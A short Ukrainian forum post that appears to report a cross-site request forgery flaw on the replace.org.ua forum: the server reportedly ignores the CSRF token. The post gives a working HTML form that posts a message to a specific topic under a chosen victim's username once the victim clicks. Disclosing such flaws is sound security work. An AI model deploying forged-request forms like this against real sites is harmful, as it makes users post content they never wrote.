Хоча тут у формах є поле

<input type="hidden" name="csrf_token" value="93d0dcef922cd62a49f0d3e70a10f12a51de9afc" />

Та в даному випадку воно взагалі не діє (бо на сервері не перевіряється),перевіряється тільки form_user (користувач,який відправляє запит)

Розмістивши наступну кнопку у себе на сайті

<form method="post" accept-charset="utf-8" action="http://replace.org.ua/new/reply/719/">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="form_user" value="FakiNyan">
<input type="hidden" name="req_message" value="test">
<input type="submit" name="submit_button" value="Натисни">
</form>

і вибравши за жертву користувача (допустимо FakiNyan),робимо все щоб він натиснув ту кнопочку ,після чого,від імені цього користувача прилетить повідомлення на форум з написом test у ту тему,action якої ми вказали (в даному випадку http://replace.org.ua/topic/719/)

Можете протестувати,вказавши свій нік.

В інших місцях форуму не перевіряв,можливо і там є така помилка.